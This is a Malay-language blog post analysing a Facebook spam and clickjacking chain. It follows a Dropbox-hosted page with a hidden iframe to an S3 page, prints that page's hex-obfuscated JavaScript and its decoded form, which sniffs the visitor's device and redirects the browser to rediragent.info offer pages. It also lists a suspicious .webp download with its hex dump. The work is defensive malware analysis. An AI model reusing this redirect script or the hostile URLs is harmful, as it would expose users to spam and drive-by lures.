Facebook & Spam a.k.a Clickjacking Reverse Part 1

Assalamuialaikum selamat malam semua...da makan...heheh harini ryu nak share pasal Facebook & Spam a.k.a Clickjacking Reverse sebab ryu slalu kena kat facebook...

Selalu post-post benda pelik ryu dapat... contoh orang tagged kita dengan benda lucah...
then ryu cuba cari url pada yang sangkut..tapi tak jumpa fine..time tu ryu kecewa..lepas tu ryu dapat mendapat isu dari student pasal benda ni..then...time ni free ryu cuba reverse apa yang ryu dapat

1st ryu dapat url ni

https://dl.dropboxusercontent.com/s/ixipmb9ctf6zpv2/7u9HdDstL4ti.html

tapi nak buka takut..jadi kena hati-hati

dalam source code dia

<html>
<body>
<iframe src="https://s3-sa-east-1.amazonaws.com/99876612/spreadid.html" style="display:none;"/>
</body>
</html>

jadi..ada lagi url yang membolehkan url ini spread data ke tempat lain..hmmm nice... lepas tu ryu cuba lihat isi dalam url tadi...

"https://s3-sa-east-1.amazonaws.com/99876612/spreadid.html"

tada...dapat isi spreadid.html ni

<html>
<img src="http://whos.amung.us/widget/wallidtraff.pnh" widht="0" height="0" border="0" />
<script>
var _0x585c=["\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x74\x65\x73\x74","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x77\x69\x64\x67\x65\x74\x2F\x64\x72\x6F\x69\x64\x6F\x66\x66\x69\x64\x2E\x70\x6E\x68\x22\x20\x77\x69\x64\x68\x74\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x2F\x3E","\x77\x72\x69\x74\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x61\x6E\x64\x72\x6F\x69\x64\x2D\x69\x64\x2E\x70\x68\x70","\x69\x4F\x53","\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x77\x69\x64\x67\x65\x74\x2F\x69\x6F\x73\x6F\x66\x66\x69\x64\x2E\x70\x6E\x68\x22\x20\x77\x69\x64\x68\x74\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x2F\x3E","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x69\x6F\x73\x2D\x69\x64\x2E\x70\x68\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x63\x68\x72\x6F\x6D\x65\x2D\x69\x64\x2E\x70\x68\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x64\x69\x72\x61\x67\x65\x6E\x74\x2E\x69\x6E\x66\x6F\x2F\x67\x65\x6E\x65\x72\x69\x63\x2D\x69\x64\x2E\x70\x68\x70","\x70\x6C\x61\x79\x4E\x6F\x77\x28\x29"];var isMobile={Android:function (){return navigator[_0x585c[1]][_0x585c[0]](/Android/i);} ,iOS:function (){return navigator[_0x585c[1]][_0x585c[0]](/iPhone|iPad|iPod/i);} };var is_chrome=/chrome/[_0x585c[3]](navigator[_0x585c[1]][_0x585c[2]]());function playNow(){if(isMobile.Android()){document[_0x585c[5]](_0x585c[4]);window[_0x585c[7]][_0x585c[6]]=_0x585c[8];} else {if(isMobile[_0x585c[9]]()){document[_0x585c[5]](_0x585c[10]);window[_0x585c[7]][_0x585c[6]]=_0x585c[11];} else {if(is_chrome){window[_0x585c[7]][_0x585c[6]]=_0x585c[12];} else {window[_0x585c[7]][_0x585c[6]]=_0x585c[13];} ;} ;} ;} ;setTimeout(_0x585c[14],666);
</script>
</html>

hmmm encode file..no bad..just reverse balik guna hexcoder ...lulz

lolol reverse dapat ni

<html>
<img src="http://whos.amung.us/widget/wallidtraff.pnh" widht="0" height="0" border="0" />
<script>
var _0x585c=["match","userAgent","toLowerCase","test","<img src="http://whos.amung.us/widget/droidoffid.pnh" widht="0" height="0" border="0" />","write","location","top","http://rediragent.info/android-id.php","iOS","<img src="http://whos.amung.us/widget/iosoffid.pnh" widht="0" height="0" border="0" />","http://rediragent.info/ios-id.php","http://rediragent.info/chrome-id.php","http://rediragent.info/generic-id.php","playNow()"];var isMobile={Android:function (){return navigator[_0x585c[1]][_0x585c[0]](/Android/i);} ,iOS:function (){return navigator[_0x585c[1]][_0x585c[0]](/iPhone|iPad|iPod/i);} };var is_chrome=/chrome/[_0x585c[3]](navigator[_0x585c[1]][_0x585c[2]]());function playNow(){if(isMobile.Android()){document[_0x585c[5]](_0x585c[4]);window[_0x585c[7]][_0x585c[6]]=_0x585c[8];} else {if(isMobile[_0x585c[9]]()){document[_0x585c[5]](_0x585c[10]);window[_0x585c[7]][_0x585c[6]]=_0x585c[11];} else {if(is_chrome){window[_0x585c[7]][_0x585c[6]]=_0x585c[12];} else {window[_0x585c[7]][_0x585c[6]]=_0x585c[13];} ;} ;} ;} ;setTimeout(_0x585c[14],666);
</script>
</html>

ok redirect ke web https://www0.groupdealsuccess.com/offer/gdtsbs7/?offer=gdt_081313_v12&id1=1959382435&id2=19922&session-id=0df0833265c594b7dedc5e4177da08a4

hurmmm tapi dalam 1 web lagi..ryu dapat satu req untuk download file default.webp?

http://www.beritavideo.info/gadis/index_files/default(12).webp <---

5249 4646 d40c 0000 5745 4250 5650 3820
c80c 0000 5036 009d 012a 7800 5a00 3e29
1086 4222 0556 a1b7 0800 a12c 6671 4ecc
7f78 e777 fc87 f1de 3159 73fc 77a0 67f2
5ff0 1a61 e003 f23f fa7f e797 35f1 75f8
81eb 6be6 1e4f 4549 9fe0 0548 14a6 7fc4
3f22 3417 158b 8be6 621d f95f acdf 66e4
c7b4 48bb d887 d697 ddde feaf db8f 543f
aebe b39e 9aff c07a 477f 40d3 e1f6 84ff
05e7 55ab ab19 ae00 fdc7 c15f 067e b2fd
8ff6 ab8f 074c f98b fcab ee2f ed7c ccff
6fe1 9fc4 3d42 ff18 fe87 fe3f 8456 cc77
e5ff 65f9 51cd 5f72 f7fb 3e46 b900 f565
feef ff17 f99f 4a3f 4dff e2ff 31f0 19fc
e3fb 0ffc 1fce 0ef6 5e8b dfb0 0a7a aa00
d122 8042 22e6 7567 45d1 f657 cff4 3554
6cf9 ffcd 562a ba87 d704 69db 5a56 a7ab
f5a5 ce4d 64c0 acec a142 4491 bf4b fe84
f193 91ee 3adf 2688 7f89 8ec7 f72f 9b3a
115e 80e7 6893 6abe 97cb 6ed2 19e3 1b4c
1f57 ab17 81d8 4529 c945 dfe3 9a58 e8f3
ac5b 8b2c 5865 7587 0afa 0833 e387 74b3
5c11 361d afbf a195 07b9 68ab 24fd 28cf
2267 b11a 301f 7f5f 810b 12a2 8bb3 b51a
3549 4588 0aad e899 e34a 18d2 0f57 f9e1
ebaf 5407 ff9f 29a7 d6e0 f4ce 820f aee2
9406 636b 0ff0 fe03 f6e9 162d 576f d994
4ff2 9054 e362 1e6d 2ce6 7aca 5988 1c3b
3992 5b5a f2f3 2f16 54a0 d8b3 a87e 8000
fefd c70b fffb b07b bbe8 8cbf fffd d6dc
7b29 fffe aa4a 7fbd b181 677b db8f ae5c
524a 5b8e 44fb d11a d0d5 75f9 868c b28b
da83 c567 e862 9294 8711 cba3 b7e7 58fe
afaa c1c6 fb34 d176 a42f fcce e194 e213
e23f ad5f f7f3 199e 276e d1db 4a08 3c7f
d00b fcb8 2289 df9c f139 c62f d02d e14b
44ec 3764 90bf 7ebc 4c46 7e30 bdf8 00f9
8d78 7518 fa1a 66a0 3fdf 3c03 b9e3 1f2e
4ffe 53f0 ed0a 5898 5951 5a0a 0390 0d7b
74ed 0a5b 7efc ec93 b9a8 9539 3851 fe4a
efee 45e4 dac7 dee3 cf02 c482 7984 d829
281b 1fd7 6357 3173 cb99 46fe 557c bea0
7811 afb0 c9a6 2e5f a60c 5b74 4e7d 92bc
6231 2b34 5b8c d01b 9dd2 2d0f 3f5c 632a
a297 f615 bd2e 40d1 ff42 57b7 4347 4840
8003 64b4 84ef 2bcc 9c62 2b97 7206 b02a
4148 6ee7 7de5 82c3 4868 d4ed 48b8 fffa
11bd 9469 44cd 749a d774 e3d7 06aa d48c
1d71 a8a3 2c3f eee2 b58a 5a7e 2b1f 502c
d683 f566 a48e 44da b388 ae44 b310 a048
315e 7b8b ff4e 6cef 00db 95f2 5b24 7b6b
3f38 648b 8c05 1a4c 6c1b d11b 6806 5708
7d4c eed0 d49d 03e0 1c72 949f bccd 3f08
d523 4670 7ad4 c0e6 9f42 36b9 6c0f e9a6
f0d5 2292 a306 80ec 6235 ae1b 9c2f 5eea
643b caef f22f 5940 4c9c ba70 464c 59c4
9b67 d0c9 1a0c bb6b a4a5 f8ee 7e57 29ca
cf35 af06 299f a5b8 a653 1131 fcf8 3aac
fcc2 e9a6 88fb 48ee 44bf c345 2c04 d9d4
dbff 951f 55a5 e1e2 f1c9 9bf0 0171 b997
796f 0995 f840 694e dbe2 9167 d15f ac85
7d67 ec9e 33cf 3cbc fc67 7b1f 9f57 fd28
e504 71bd 0b41 b74b 801a 4f96 bbc2 4818
715a a435 79a8 453b a024 e5ea 1d36 3f30
4975 3b4e 35a0 6312 59d3 fe5c 3d95 0b21
fa01 1da2 a3f2 0a47 9a21 e768 3ec8 c1e3
450f 9a9d 31ce 55d0 78be 603c af65 8018
21d1 ae02 0ff8 621a 97e2 5d38 c90f cbd7
8def 51ee 0321 2bd2 30fa 85dc 0b11 a5ae
6f26 2e3d 72f2 fdc4 550d 45cf 2927 c73d
cb44 2917 a741 3860 9f84 cf8a 0950 77a0
e725 dbdd 42f8 b8f6 37d1 86ac a553 5e1f
58c3 c057 bb29 7359 d5fa 7b89 767d 4263
0925 375c 277a c52e 124c aff1 c7c5 80a1
91f9 992a a9c3 2594 8e5b 71a1 aaf3 3e34
7669 ebef 5ab1 371e f669 8abb def1 cfaa
8333 0f7b c1e5 ad85 4826 952c f7f6 4b67
41d0 3641 174b 21ce b94b 9921 de03 b47c
9789 75ba 953f 61f5 3d2c fac8 b65c b594
30b3 34df 55d5 eb7d b67b 2207 212c fd57
020c 7d3b a1bf 3fe0 d78a 3c21 3753 acc5
e449 55b7 e831 a640 4fb9 4be5 61cc a7cb
1db7 41f8 df02 e7a9 0150 97a4 9722 9ce2
894b 8bd6 6148 71ad 4ff6 99be 5f12 7f42
8d5e c5d8 9a4f bd72 5db1 d64f 9578 5005
091e 2045 83a2 bff0 4d59 c82b 3fb2 e0d1
8064 986f 5391 eaf7 f2c8 8fdc 2577 beb6
cd2e f0fa 6054 e0c7 bccd fbb9 f368 7b4c
2129 b3d3 69ee 096e 3cee f9be 8b9f 38e8
a7a3 162e 6ad4 75fc cd3f 8da9 6fcf ce14
0786 0a8a 8482 69ec 4c38 8c65 d229 822b
7757 4737 cb68 59c6 301d 81f7 2da2 7450
b409 6fc9 83d0 9f35 d1bb 47a7 58fc 5f35
c9ba 551f f9f3 5e72 a808 f940 55f5 bee7
fa85 e343 dd27 43b2 8724 f875 b5d4 f67c
1bb5 f42d f4ca 0ca5 e0ee d657 3a84 a9b9
20e6 991b 8e4d 29e6 7f0a b933 3017 2161
664f 3a08 567f 6552 dc3a a144 1307 03b8
ae21 1011 20ef 46b9 e115 91e4 260c 732c
e025 bbb8 7b4c f69b bcf7 36ca 7ce2 8371
a280 da5f 76ca c2a1 1dc2 887c 3ffc 8eed
a78f a67e d0d3 2924 f492 fc35 b07f ccc6
1dd4 4946 c5b1 7dd5 d28c 6f65 e514 97f5
4aae c7e7 72a8 7b95 1c07 9855 699e eeff
a8e5 76e5 c71d 5ccc f72a 62bd 0d34 cbe5
e4b3 a06a 518c 8923 b284 c029 7a5f bba1
3f76 0f59 987e eaf7 653c b14d 4c3d 9aec
539f 50b1 1274 20ad 39d6 17f0 1cab 29fc
5880 9d4f 4c04 f683 6f71 0f48 3bdc 69e2
cb20 e307 43d9 79cb e529 0522 ff1f 2a2f
6ee0 bb61 2d50 0638 191d aa0e a560 3ba2
f071 a146 ada5 d6bb 02b9 52d3 c37c 7e73
ea50 d3dc 1f31 2522 0126 699b ab56 43ae
1a0b cbd8 82a7 0fea 8d4d 0300 7471 96bd
f4d1 3fba 3e87 fbd5 09b4 a403 d3e9 117f
9d18 d078 4c6b 2d55 55c1 fa64 74d5 182c
db7a e7df 5620 c3ab d7cf e8fe 74e5 6e39
2ff3 c727 d47f 7317 e58a 6be9 5e73 14ae
81de bc4b c909 488a 71a5 3e5c 5161 3f4c
c99e a29f 36eb 1429 71a8 dbe9 2eb5 7efe
9e84 1a1b d59f 940a bdd0 4c82 9710 4ce3
439b 09ad 5f2d 7a78 32bc f851 7f17 16db
c13b ab3e 1d1c 1956 c1e1 79bd 4eb8 9287
dc05 737e 9180 f7e4 67bb 0775 63a9 7036
a6bd fcc6 4524 3d77 1889 b4aa 5446 d9d0
2e19 62af 0f42 8d64 6a6c 22b4 e624 0356
af92 e842 3310 7d72 7acc e9db cf4f 034f
be4f 78d2 a694 b271 c8e8 00fd 84d3 8cfb
aa36 5eda e994 a1cc 1ec5 c2d6 c6e9 32ba
2edd 40ef ce78 1baf 1abc e434 bacf 5687
bc54 0bf3 4490 338e e24b e9d9 b701 ccb3
2e06 a26c 1578 ebba de30 2300 b829 8557
3722 8b73 e5e2 5dbf 39ec d697 e803 c6f6
8bef a887 e9f8 630c 7212 a1c7 45b3 4e35
5149 8b2b 115e caec fa74 7e74 fb7d 6749
0bb2 757d 6882 6fbe 44a5 1786 bba9 3924
6e95 f3a4 16a2 62fc 0260 f170 f9e4 1b8d
fc5f 385a 643d a858 559b 9b5f 051a c6c0
fee3 ea9e a919 6ef5 548d 8218 d507 73bb
352a fc46 e6ce e04f ea98 cc90 e87e 5c9f
f758 c942 269f 7ed8 b478 06a0 96f1 4269
a246 3ddc 71f7 aba9 0433 bd8c fb90 ec7f
e66b 1a6d ca6b aa77 687a 9524 37fe 5381
0309 fc24 7a1a c689 4943 b04b fabf 9d6f
67a9 9c95 b630 4d8a 8c90 52fe 6c67 4711
33d6 e1f8 1327 5e04 8436 6905 f841 f1b4
c3c9 7dbd 6095 29aa 9e56 4a98 9427 c7f7
dd45 ae4f ce35 7072 bbbc 61d8 ec10 9ed3
bc2f 50ad ed4a ec5e 1185 6005 5d3f e15e
eeef de5c 8229 2b19 a3ba 0915 b39b 124e
d27f 9d69 4716 6aef 49af 0dc0 881b c4c1
f220 f3fd 95a2 d83d 861c 81d2 1828 e805
17c5 78ab cf94 a76f a7d1 8b05 4b93 832f
d425 0188 05f9 3ea1 5b23 25b3 956b 6d7d
6907 c542 463d 4bb0 db39 ec50 3a05 8f28
fcda 3194 0119 c1f4 c489 c9a0 8a74 f9d7
1b5f 9bc8 1b46 3810 814e fcd4 2bd9 031e
b67a 078d 575d 3f70 0cd1 69ba 0d5e c3f2
68bd e35e fc8c bee7 b1ef 185a a3d1 de49
fe90 4cfa 7771 f979 8407 0ac6 77a4 133a
911e bdd8 5c72 48f4 c763 2ab1 20f0 4b51
aaed ad90 5169 aa6c 817c 305c 6d1f 1a6b
da68 81fa 211b f1b6 f3af d997 fa58 70e9
7e97 3c77 6149 ca0b fcda 9314 1924 641f
0078 a6fa 9729 cc4c 04fc e57f 93fe b04d
21fa 4dd5 380f beb5 0ff0 ebca 0b42 03b6
891a 5042 536f b12b bd0d e177 babb d742
8dac 0b6d bb22 62ad a438 24f3 2b0c a5b7
af8f 572b 1814 831b e8da 131f f7ea fffe
5e9f fde3 414d ec2d cde9 5fa5 c3ff bcef
c979 bc12 67ff 0fdd 9420 8ed7 4ab3 998b
f88f 5188 f207 df32 f7e2 7793 386a 8e30
dfed 031f 5412 e61c aa2b 092e 5515 86cc
3ee7 ffcf f2d8 f69d ee59 4502 dde7 891c
6feb 3cb2 379c 9ddb 8fb9 751e 1f2e e8b7
f6f4 b597 b215 23e2 e091 b6df 691a 428f
7eca 0d7f 0777 2387 9f05 19e4 1ff1 04fd
7f1f daaf 4d35 9719 975b 2ce6 ea59 725b
36ec 0e1f 041c 8acd 07ee 715f a5a5 fe3a
9baa 1801 09e8 b6bc 6e10 5485 9b3c 4fb0
b879 cc44 a459 27b8 04a5 ad5f ddf8 f3ff
fe7d 3ffe b6b7 2b93 fee5 3ffe 056f a8c9
7c35 c7a1 f765 9916 5fdd 167f 13f4 2927
9fff b2f3 6b03 e30c 7f60 6617 ffd8 79b5
04b5 ae4f 5c7a 9cbf bb69 40f6 74bc 1ccc
f7cf 75fd 6557 eded 5051 ebff 30f6 cf0c
9637 a1f7 4e27 b637 a858 3d3e dded e89e
d00f f1ec eabd deb3 5614 0199 6aa6 b804
7b98 536c 76d5 7347 3a57 b33b 13a7 6753
320d 727b 06b9 80d9 e760 c7dd 6c8e cd54
6899 0511 4345 d979 40a6 ec1c 8981 9e6f
6587 7a93 2b5c b390 d809 880f 43e1 5294
7edd bef6 c374 b078 b7b0 debf 4dad 3b99
42b2 ee0f ec32 d84a 7868 1d89 1bb3 0005
367c cc8a 9a9d 6f5d b34e eeb1 8f09 66cb
cb57 adc3 f2db c9c3 249f a13e d54e 6c08
7146 1281 ca71 5a0d 962f 8368 9844 91e1
8cf8 d028 2069 14ee 13e6 edeb bf16 4178
b107 385e ddb3 80d1 cfd2 7175 9ca2 3b14
2edb ca76 77f0 1089 30fa 0ced d4da 004b
fe98 270c fefa e660 32ec 5e53 d88f 8f33
2d6c 396b 8880 592b 26b3 0de6 4c9a fcea
64bc b935 c594 af29 f948 2795 d3e8 b90e
3b34 55e5 3602 9327 0a02 e8a7 a462 4172
12c0 38a9 9626 6080 1783 b38f 7ba5 0d89
3020 0000 0000 0000 0000 0000

Malwr scann
https://malwr.com/analysis/M2EyZjhkMjc3ZmYyNGQyZmFhNDJiMDA5NWJkZjI5YTg/

ok...format ape ek..try decode to jpg ni output dia

ok...tunggu part 2 plak..ryu nak cuba tapau apa yang diorg buat...

Pages

Facebook & Spam a.k.a Clickjacking Reverse Part 1

Belum ada tanggapan untuk "Facebook & Spam a.k.a Clickjacking Reverse Part 1"

Post a Comment

Facebook & Spam a.k.a Clickjacking Reverse Part 1

Postingan terkait:

Belum ada tanggapan untuk "Facebook & Spam a.k.a Clickjacking Reverse Part 1"

Post a Comment